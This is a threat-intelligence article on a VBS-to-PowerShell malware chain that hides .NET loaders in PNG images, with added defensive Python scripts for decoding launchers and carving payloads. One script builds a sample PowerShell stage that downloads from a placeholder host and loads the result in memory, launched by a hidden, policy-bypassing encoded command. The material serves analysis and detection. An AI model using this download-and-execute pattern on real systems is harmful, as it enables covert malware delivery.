LevelBlue SpiderLabs has documented a sophisticated, multi-stage delivery framework that chains obfuscated Visual Basic Script (VBS) files, fileless PowerShell loaders, and payloads hidden inside PNG images.
The activity was initially detected by LevelBlue’s Managed Detection and Response (MDR) SOC through a SentinelOne alert involving a suspicious VBS file.
The file, identified as Name_File.vbs, was located in a public downloads directory and was blocked before execution. Despite successful containment, deeper analysis exposed a far more complex operation involving modular loaders and reusable attacker infrastructure.
During triage, analysts found no prior reputation for the file hash and no related activity in historical telemetry, suggesting an isolated event.
However, SentinelOne telemetry revealed that the script contained a Base64-encoded PowerShell command, prompting further investigation.
LevelBlue SpiderLabs then took over the investigation from the MDR SOC and traced the full delivery chain.
Decoding the VBS file showed it functioned primarily as an obfuscated launcher. Heavy Unicode-based obfuscation concealed its logic, which ultimately reconstructed and executed a hidden PowerShell payload at runtime.
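The first analyst task in this chain is to pull the Base64 blob out of the launcher and read the PowerShell it hides. The script below is an added example written for this article, not code from LevelBlue's report or from the malware: it extracts long Base64 tokens from a launcher, decodes them as UTF-16LE (what powershell -EncodedCommand expects) or UTF-8 (what an inline FromBase64String/UTF8.GetString chain produces), and flags the loader behaviours described on this page. The sample launcher and stage-2 script are constructed for the example; the indicator names and the example.invalid URL are mine.

```python
import base64
import re

# Indicator patterns for the loader behaviour described above: TLS 1.2
# enforcement, WebClient downloads, reflective .NET loading and the
# BaseStart/BaseEnd markers. The key names are my own labels.
LOADER_INDICATORS = {
    "tls12": re.compile(r"SecurityProtocol.*Tls12", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download": re.compile(r"Download(Data|String|File)\s*\(", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load\s*\(", re.I),
    "png_markers": re.compile(r"BaseStart|BaseEnd"),
}

# Runs of 40+ Base64 alphabet characters; short tokens are skipped to limit noise.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_powershell_b64(token: str) -> str:
    """Decode a Base64 token as UTF-16LE (-EncodedCommand) or UTF-8 (inline decode)."""
    raw = base64.b64decode(token)
    # ASCII text encoded as UTF-16LE has a NUL in every second byte.
    odd_bytes = raw[1::2]
    if len(raw) >= 2 and raw[1] == 0 and odd_bytes.count(0) >= len(odd_bytes) * 0.9:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def score(text: str) -> list[str]:
    """Return the names of every loader indicator present in the decoded text."""
    return [name for name, rx in LOADER_INDICATORS.items() if rx.search(text)]


def triage_launcher(launcher: str) -> list[dict]:
    """Find and decode every embedded Base64 blob in a launcher script."""
    findings = []
    for token in B64_TOKEN.findall(launcher):
        try:
            decoded = decode_powershell_b64(token)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        findings.append({"decoded": decoded, "indicators": score(decoded)})
    return findings


# Constructed sample stage-2 script modelled on the chain described above.
# It is not the real script; the URL is a placeholder.
SAMPLE_STAGE2 = (
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;"
    "$wc = New-Object Net.WebClient;"
    "$png = $wc.DownloadString('https://example.invalid/logo.png');"
    "$i = $png.IndexOf('BaseStart') + 9; $j = $png.IndexOf('BaseEnd');"
    "$asm = [Reflection.Assembly]::Load([Convert]::FromBase64String($png.Substring($i, $j - $i)));"
    "$asm.EntryPoint.Invoke($null, $null)"
)


def build_sample_launcher() -> str:
    """Constructed VBS launcher that runs the sample via powershell -enc."""
    enc = base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode()
    return (
        'Set sh = CreateObject("WScript.Shell")\r\n'
        f'sh.Run "powershell -w hidden -ep bypass -enc {enc}", 0, False\r\n'
    )


if __name__ == "__main__":
    for finding in triage_launcher(build_sample_launcher()):
        print("indicators:", ", ".join(finding["indicators"]))
        print(finding["decoded"])
```

On a real sample the Unicode-based obfuscation the report describes sits in front of this step: the launcher first has to be deobfuscated (or the decoded command captured from process telemetry, as SentinelOne did here) before the Base64 token is visible to the regex.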
Fileless Loader and PNG Payloads
The decoded PowerShell script behaved as a fileless loader. It forced TLS 1.2 for its outbound connections and used the System.Net.WebClient class to retrieve remote content. Instead of downloading a traditional executable, the script fetched a PNG image from a remote server.
Inside the PNG file, researchers discovered embedded Base64-encoded data marked by custom “BaseStart” and “BaseEnd” tags.
This data contained a .NET assembly that was decoded and executed directly in memory using reflection, a technique commonly associated with the PhantomVAI loader.
This approach allowed the malware to avoid writing the assembly to disk, removing it from the reach of file-based scanning by traditional security tools.
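Given a captured PNG, the defender-side check is to carve whatever sits between the BaseStart and BaseEnd tags and confirm it is really a .NET assembly rather than image data. The following is an added example written for this article, not code from the report or the loader: it carves and Base64-decodes every tagged span from the raw bytes, then parses the PE headers far enough to test whether the CLR runtime header directory (data directory 14) is populated, which is what distinguishes a managed assembly from a plain native PE. The carrier PNG and the minimal PE header are constructed inline for the example.

```python
import base64
import re
import struct
import zlib

# Marker strings taken from the report; everything else here is example code.
START, END = b"BaseStart", b"BaseEnd"


def carve_between_markers(blob: bytes) -> list[bytes]:
    """Return every Base64 span between the tags, decoded to raw bytes."""
    out = []
    for m in re.finditer(rb"BaseStart(.*?)BaseEnd", blob, re.S):
        b64 = re.sub(rb"\s+", b"", m.group(1))
        try:
            out.append(base64.b64decode(b64, validate=True))
        except ValueError:
            continue  # tag pair without valid Base64 inside, skip it
    return out


def is_dotnet_assembly(data: bytes) -> bool:
    """True if data is a PE32/PE32+ file with a non-empty CLR runtime header entry."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if pe_off + 26 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return False
    opt_off = pe_off + 24  # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x10B:        # PE32: data directories start at optional header + 96
        dd_off = opt_off + 96
    elif magic == 0x20B:      # PE32+: data directories start at optional header + 112
        dd_off = opt_off + 112
    else:
        return False
    if dd_off + 15 * 8 > len(data):
        return False
    n_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]  # NumberOfRvaAndSizes
    if n_dirs < 15:
        return False
    rva, size = struct.unpack_from("<II", data, dd_off + 14 * 8)  # COM_DESCRIPTOR
    return rva != 0 and size != 0


def triage_png(blob: bytes) -> list[dict]:
    """Carve tagged payloads and report whether each decodes to a .NET PE."""
    return [{"size": len(p), "dotnet": is_dotnet_assembly(p)} for p in carve_between_markers(blob)]


def build_fake_pe(dotnet: bool) -> bytes:
    """Constructed minimal PE32 header: enough for the check, not a loadable binary."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)     # CLR header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def build_sample_png(payload: bytes) -> bytes:
    """Constructed carrier: a valid 1x1 PNG followed by the tagged Base64 blob."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    sig = b"\x89PNG\r\n\x1a\n"
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    return sig + ihdr + idat + chunk(b"IEND", b"") + START + base64.b64encode(payload) + END


if __name__ == "__main__":
    for hit in triage_png(build_sample_png(build_fake_pe(True))):
        print(f"payload of {hit['size']} bytes, .NET assembly: {hit['dotnet']}")
```

The search runs over the raw bytes rather than parsed PNG chunks on purpose: the report says only that the data was inside the PNG, and a byte-level scan catches the blob whether it trails IEND or is wrapped in an ancillary chunk. Image viewers ignore both, which is why the carrier still renders.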
Alongside the VBS loaders, the attacker's hosting also held a batch script (44rrr.bat) and a compressed archive masquerading as a PDF (Invoice-JL1852586778.pdf.zip), as the report's directory listing shows; these belong to the second infection chain described below.

Once executed, the in-memory loader retrieved additional payloads from attacker-controlled infrastructure.
One obfuscated URL resolved to a text file containing encoded data that ultimately deployed Remcos RAT, a well-known remote access trojan. Another payload included a UAC bypass DLL to escalate privileges.
The execution chain demonstrated a clear separation of roles: the VBS acted as the entry point, PowerShell handled delivery, and the .NET loader managed payload execution and persistence.
Open Directory Infrastructure
Further investigation uncovered that the attack was supported by an open-directory architecture hosted on a domain with multiple accessible paths, such as /coupon/, /protector/, and /invoice/.

These directories contained numerous obfuscated VBS files mapped to different malware payloads, including XWorm and other RAT variants. This structure allowed attackers to reuse the same loader framework while swapping payloads as needed.
Notably, the /invoice/ directory revealed a separate infection vector involving a fake PDF file distributed as a ZIP archive.

The secondary chain included batch scripts encoded in UTF-16LE that ran with a hidden window and initiated outbound connections to retrieve more payloads. Analysis showed deployment of Python-based malware, including components linked to the Kramer family.
These scripts performed memory injection, shellcode execution, and further payload staging, often using deceptively named directories such as “MainRingtones” to evade suspicion.
The fake PDF archive contained a malicious Internet Shortcut file that redirected victims to attacker-controlled Cloudflare infrastructure, triggering additional downloads and execution.

Researchers concluded that this campaign represents a scalable and reusable malware framework rather than a single attack. The use of open directories, fileless techniques, and multi-language payloads increases both flexibility and evasion.
The campaign highlights how attackers combine scripting, cloud hosting, and non-traditional file formats to bypass defenses while maintaining rapid payload rotation capabilities.
To mitigate such threats, organizations should restrict execution of scripts like VBS and BAT files, especially from user-writable locations. Monitoring PowerShell activity and in-memory execution is critical, along with blocking suspicious domains and limiting WebDAV traffic.
LevelBlue has since deployed custom detections targeting similar VBS loaders, PNG-based payload staging, and related infrastructure, strengthening defenses against this evolving threat model.